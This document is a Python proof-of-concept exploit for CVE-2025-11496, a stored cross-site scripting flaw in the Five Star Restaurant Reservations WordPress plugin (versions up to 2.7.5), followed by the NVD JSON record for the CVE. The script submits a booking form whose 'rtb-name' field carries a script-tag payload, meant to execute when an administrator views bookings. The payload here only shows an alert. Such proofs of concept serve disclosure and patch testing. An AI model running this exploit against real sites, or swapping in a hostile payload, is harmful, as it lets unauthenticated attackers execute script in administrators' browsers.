CVE-2025-11496

import requests import re # CVE-2025-11496 PoC - Stored XSS in WordPress Restaurant Reservations Plugin # Target: WordPress site with Five Star Restaurant Reservations plugin <= 2.7.5 target_url = "http://target-wordpress-site.com/" booking_form_url = target_url + "restaurant-reservations/" # Malicious payload - XSS via rtb-name parameter xss_payload = '<script>alert(String.fromCharCode(88,83,83,32,80,111,67))</script>' def exploit_stored_xss(): """ Exploit stored XSS vulnerability in rtb-name parameter This PoC demonstrates how attacker can inject arbitrary JavaScript """ # Prepare booking form data form_data = { 'rtb-name': xss_payload, 'rtb-email': '[email protected]', 'rtb-phone': '1234567890', 'rtb-date': '2025-12-25', 'rtb-time': '19:00', 'rtb-party': '2', 'rtb-message': 'Test reservation' } try: # Submit the malicious booking request response = requests.post(booking_form_url, data=form_data, timeout=10) if response.status_code == 200: print("[+] XSS payload submitted successfully") print("[+] Payload stored in database") print("[*] When admin views bookings, XSS will execute") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("CVE-2025-11496 PoC - Stored XSS") print("Target: Five Star Restaurant Reservations Plugin < 2.7.6") exploit_stored_xss()

{"cve": {"id": "CVE-2025-11496", "sourceIdentifier": "[email protected]", "published": "2025-12-21T03:15:50.517", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Five Star Restaurant Reservations – WordPress Booking Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rtb-name' parameter in all versions up to, and including, 2.7.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3408446%40restaurant-reservations&new=3408446%40restaurant-reservations&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1889c1ba-f49f-474c-8d0a-0ae46fb92deb?source=cve", "source": "[email protected]"}]}}